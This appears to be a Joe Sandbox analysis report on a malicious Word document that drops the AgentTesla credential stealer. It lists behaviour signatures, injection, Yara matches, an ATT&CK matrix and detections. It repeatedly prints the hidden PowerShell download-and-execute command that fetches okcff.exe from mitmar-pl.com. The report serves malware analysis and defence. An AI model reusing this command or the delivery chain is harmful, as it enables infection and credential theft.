                    Source: C:\Users\user\AppData\Roaming\okcff.exe TID: 1724Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\okcff.exe TID: 308Thread sleep time: -300000s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\okcff.exe TID: 2108Thread sleep time: -7378697629483816s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\okcff.exe TID: 2108Thread sleep time: -120000s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\okcff.exe TID: 2292Thread sleep count: 302 > 30
                    Source: C:\Users\user\AppData\Roaming\okcff.exe TID: 1012Thread sleep count: 9438 > 30
                    Source: C:\Users\user\AppData\Roaming\okcff.exe TID: 2108Thread sleep count: 101 > 30
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\okcff.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\okcff.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\okcff.exeWindow / User API: threadDelayed 9438
                    Source: C:\Users\user\AppData\Roaming\okcff.exeWMI Queries: IWbemServices::CreateInstanceEnum - Win32_Processor
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\okcff.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\okcff.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\okcff.exeThread delayed: delay time: 30000
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
                    Source: okcff.exe, 00000009.00000002.620634062.000000000079D000.00000004.00000020.sdmpBinary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Users\user\AppData\Roaming\okcff.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Users\user\AppData\Roaming\okcff.exeProcess token adjusted: Debug
                    Source: C:\Users\user\AppData\Roaming\okcff.exeMemory allocated: page read and write | page guardJump to behavior

                    HIPS / PFW / Operating System Protection Evasion:

                    barindex
                    Injects files into Windows applicationShow sources
                    Source: C:\Windows\System32\notepad.exeInjected file: C:\Users\user\AppData\Local\Temp\abdtfhghgeghDp .ScT was created by C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                    Bypasses PowerShell execution policyShow sources
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://mitmar-pl.com/okcff.exe','C:\Users\user\AppData\Roaming\okcff.exe');Start-Process 'C:\Users\user\AppData\Roaming\okcff.exe'
                    Injects a PE file into a foreign processesShow sources
                    Source: C:\Users\user\AppData\Roaming\okcff.exeMemory written: C:\Users\user\AppData\Roaming\okcff.exe base: 400000 value starts with: 4D5AJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://mitmar-pl.com/okcff.exe','C:\Users\user\AppData\Roaming\okcff.exe');Start-Process 'C:\Users\user\AppData\Roaming\okcff.exe'
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://mitmar-pl.com/okcff.exe','C:\Users\user\AppData\Roaming\okcff.exe');Start-Process 'C:\Users\user\AppData\Roaming\okcff.exe'
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://mitmar-pl.com/okcff.exe','C:\Users\user\AppData\Roaming\okcff.exe');Start-Process 'C:\Users\user\AppData\Roaming\okcff.exe'
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://mitmar-pl.com/okcff.exe','C:\Users\user\AppData\Roaming\okcff.exe');Start-Process 'C:\Users\user\AppData\Roaming\okcff.exe'Jump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://mitmar-pl.com/okcff.exe','C:\Users\user\AppData\Roaming\okcff.exe');Start-Process 'C:\Users\user\AppData\Roaming\okcff.exe'Jump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://mitmar-pl.com/okcff.exe','C:\Users\user\AppData\Roaming\okcff.exe');Start-Process 'C:\Users\user\AppData\Roaming\okcff.exe'Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\okcff.exe "C:\Users\user\AppData\Roaming\okcff.exe" Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\okcff.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C timeout 2Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\okcff.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C timeout 2Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\okcff.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C timeout 2Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\okcff.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C timeout 2Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\okcff.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C timeout 2Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\okcff.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C timeout 2Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\okcff.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C timeout 2Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\okcff.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C timeout 2Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\okcff.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C timeout 2Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\okcff.exeProcess created: C:\Users\user\AppData\Roaming\okcff.exe C:\Users\user\AppData\Roaming\okcff.exeJump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 2Jump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 2Jump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 2Jump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 2Jump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 2
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 2
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 2
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 2
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 2
                    Source: notepad.exe, 00000018.00000002.699385356.0000000000730000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
                    Source: notepad.exe, 00000018.00000002.699385356.0000000000730000.00000002.00020000.sdmpBinary or memory string: !Progman
                    Source: notepad.exe, 00000018.00000002.699385356.0000000000730000.00000002.00020000.sdmpBinary or memory string: Program Manager<
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\hh.exe VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\hh.exe VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\hh.exe VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\okcff.exeQueries volume information: C:\Users\user\AppData\Roaming\okcff.exe VolumeInformationJump to behavior
                    Source: C:\Windows\System32\notepad.exeQueries volume information: C:\Users\user\AppData\Local\Temp\abdtfhghgeghDp .ScT VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\okcff.exeQueries volume information: C:\Users\user\AppData\Roaming\okcff.exe VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\okcff.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\okcff.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                    Stealing of Sensitive Information:

                    barindex
                    Yara detected AgentTeslaShow sources
                    Source: Yara matchFile source: 41.0.okcff.exe.400000.9.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 41.0.okcff.exe.400000.13.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.2.okcff.exe.3605ff0.7.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 41.0.okcff.exe.400000.7.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.2.okcff.exe.3605ff0.7.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.2.okcff.exe.351f270.5.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 41.0.okcff.exe.400000.5.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.2.okcff.exe.34f7250.6.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 41.0.okcff.exe.400000.11.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 41.2.okcff.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.2.okcff.exe.351f270.5.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.2.okcff.exe.35871d0.8.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.2.okcff.exe.2584fcc.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000029.00000002.699544517.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000029.00000000.616337144.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000002.623598488.00000000034DF000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000029.00000000.618395445.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000029.00000000.617550638.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000002.623303719.00000000032D3000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000029.00000000.615331968.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000002.621777237.0000000002543000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000002.623703216.0000000003587000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000029.00000002.700177359.00000000022A1000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: okcff.exe PID: 2656, type: MEMORYSTR
                    Source: Yara matchFile source: 00000029.00000002.700177359.00000000022A1000.00000004.00000001.sdmp, type: MEMORY

                    Remote Access Functionality:

                    barindex
                    Yara detected AgentTeslaShow sources
                    Source: Yara matchFile source: 41.0.okcff.exe.400000.9.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 41.0.okcff.exe.400000.13.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.2.okcff.exe.3605ff0.7.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 41.0.okcff.exe.400000.7.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.2.okcff.exe.3605ff0.7.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.2.okcff.exe.351f270.5.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 41.0.okcff.exe.400000.5.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.2.okcff.exe.34f7250.6.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 41.0.okcff.exe.400000.11.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 41.2.okcff.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.2.okcff.exe.351f270.5.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.2.okcff.exe.35871d0.8.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.2.okcff.exe.2584fcc.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000029.00000002.699544517.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000029.00000000.616337144.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000002.623598488.00000000034DF000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000029.00000000.618395445.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000029.00000000.617550638.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000002.623303719.00000000032D3000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000029.00000000.615331968.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000002.621777237.0000000002543000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000002.623703216.0000000003587000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000029.00000002.700177359.00000000022A1000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: okcff.exe PID: 2656, type: MEMORYSTR

                    Mitre Att&ck Matrix

                    Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                    Valid AccountsWindows Management Instrumentation211Path InterceptionProcess Injection212Disable or Modify Tools1OS Credential DumpingFile and Directory Discovery2Remote ServicesArchive Collected Data11Exfiltration Over Other Network MediumIngress Tool Transfer12Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                    Default AccountsScripting3Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsDeobfuscate/Decode Files or Information1LSASS MemorySystem Information Discovery114Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothEncrypted Channel1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                    Domain AccountsShared Modules1Logon Script (Windows)Logon Script (Windows)Scripting3Security Account ManagerSecurity Software Discovery211SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                    Local AccountsExploitation for Client Execution33Logon Script (Mac)Logon Script (Mac)Obfuscated Files or Information2NTDSProcess Discovery2Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol22SIM Card SwapCarrier Billing Fraud
                    Cloud AccountsCommand and Scripting Interpreter11Network Logon ScriptNetwork Logon ScriptSoftware Packing1LSA SecretsVirtualization/Sandbox Evasion131SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                    Replication Through Removable MediaPowerShell3Rc.commonRc.commonTimestomp1Cached Domain CredentialsApplication Window Discovery1VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                    External Remote ServicesScheduled TaskStartup ItemsStartup ItemsMasquerading1DCSyncRemote System Discovery1Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                    Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobVirtualization/Sandbox Evasion131Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                    Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Process Injection212/etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction

                    Behavior Graph

                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet
                    behaviorgraph top1 signatures2 2 Behavior Graph ID: 553100 Sample: 478644.doc Startdate: 14/01/2022 Architecture: WINDOWS Score: 100 69 Found malware configuration 2->69 71 Sigma detected: Powershell download and execute file 2->71 73 Multi AV Scanner detection for submitted file 2->73 75 16 other signatures 2->75 9 WINWORD.EXE 306 47 2->9         started        process3 dnsIp4 61 mitmar-pl.com 37.0.9.166, 49167, 49168, 49169 WKD-ASIE Netherlands 9->61 53 C:\Users\user\AppData\Local\...\okcff[1].exe, PE32 9->53 dropped 55 C:\Users\user\Desktop\~$478644.doc, data 9->55 dropped 57 C:\Users\user\AppData\...\abdtfhghgeghDp .ScT, data 9->57 dropped 59 C:\Users\user\AppData\Local\...\7CE2D32D.png, 370 9->59 dropped 89 Document exploit detected (creates forbidden files) 9->89 91 Suspicious powershell command line found 9->91 93 Tries to download and execute files (via powershell) 9->93 95 Microsoft Office creates scripting files 9->95 14 powershell.exe 7 9->14         started        17 powershell.exe 12 7 9->17         started        21 notepad.exe 9->21         started        23 2 other processes 9->23 file5 signatures6 process7 dnsIp8 65 mitmar-pl.com 14->65 25 okcff.exe 12 1 14->25         started        67 mitmar-pl.com 17->67 51 C:\Users\user\AppData\Roaming\okcff.exe, PE32 17->51 dropped 77 Powershell drops PE file 17->77 79 Injects files into Windows application 21->79 file9 signatures10 process11 dnsIp12 63 mitmar-pl.com 25->63 81 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 25->81 83 Machine Learning detection for dropped file 25->83 85 Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines) 25->85 87 Injects a PE file into a foreign processes 25->87 29 cmd.exe 25->29         started        31 cmd.exe 25->31         started        33 cmd.exe 25->33         started        35 7 other processes 25->35 signatures13 process14 process15 37 timeout.exe 29->37         started        39 timeout.exe 31->39         started        41 timeout.exe 33->41         started        43 timeout.exe 35->43         started        45 timeout.exe 35->45         started        47 timeout.exe 35->47         started        49 3 other processes 35->49

                    Screenshots

                    Thumbnails

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.

                    windows-stand

                    Antivirus, Machine Learning and Genetic Malware Detection

                    Initial Sample

                    SourceDetectionScannerLabelLink
                    478644.doc41%VirustotalBrowse
                    478644.doc31%ReversingLabsDocument-Office.Trojan.RTFObfustream

                    Dropped Files

                    SourceDetectionScannerLabelLink
                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\okcff[1].exe100%Joe Sandbox ML
                    C:\Users\user\AppData\Roaming\okcff.exe100%Joe Sandbox ML

                    Unpacked PE Files

                    SourceDetectionScannerLabelLinkDownload
                    41.0.okcff.exe.400000.5.unpack100%AviraTR/Spy.Gen8Download File
                    41.0.okcff.exe.400000.7.unpack100%AviraTR/Spy.Gen8Download File
                    41.0.okcff.exe.400000.9.unpack100%AviraTR/Spy.Gen8Download File
                    41.0.okcff.exe.400000.13.unpack100%AviraTR/Spy.Gen8Download File
                    41.0.okcff.exe.400000.11.unpack100%AviraTR/Spy.Gen8Download File
                    41.2.okcff.exe.400000.0.unpack100%AviraHEUR/AGEN.1138205Download File

                    Domains

                    No Antivirus matches

                    URLs

                    SourceDetectionScannerLabelLink
                    httP://mitmar-pl.com/okcff.ex0%Avira URL Cloudsafe
                    http://mitmar-pl.com/Crkrqdrd.jpegi0%Avira URL Cloudsafe
                    httP://mitmar-pl.com/okcff.exe0%Avira URL Cloudsafe
                    http://mitmar-pl.com/Crkrqdrd.jpeg0%Avira URL Cloudsafe
                    https://google.comD0%Avira URL Cloudsafe
                    httP://mitmar-pl.com/okcff.exePE0%Avira URL Cloudsafe
                    http://mitmar-pl.com0%Avira URL Cloudsafe
                    http://www.%s.comPA0%URL Reputationsafe
                    httP://mitmar-pl.com/ok0%Avira URL Cloudsafe
                    https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip0%URL Reputationsafe

                    Domains and IPs

                    Contacted Domains

                    NameIPActiveMaliciousAntivirus DetectionReputation
                    mitmar-pl.com
                    		37.0.9.166
                    		truetrue
                      		unknown

                      Contacted URLs

                      NameMaliciousAntivirus DetectionReputation
                      http://mitmar-pl.com/okcff.exefalse
                        		unknown
                        http://mitmar-pl.com/Crkrqdrd.jpegfalse
                        • Avira URL Cloud: safe
                        		unknown

                        URLs from Memory and Binaries

                        NameSourceMaliciousAntivirus DetectionReputation
                        http://www.windows.com/pctv.notepad.exe, 00000018.00000002.700250949.0000000002E00000.00000002.00020000.sdmpfalse
                          		high
                          http://www.piriform.com/ccleanpowershell.exe, 00000005.00000002.438200981.00000000003EF000.00000004.00000020.sdmpfalse
                            		high
                            http://investor.msn.comnotepad.exe, 00000018.00000002.700250949.0000000002E00000.00000002.00020000.sdmpfalse
                              		high
                              http://www.msnbc.com/news/ticker.txtnotepad.exe, 00000018.00000002.700250949.0000000002E00000.00000002.00020000.sdmpfalse
                                		high
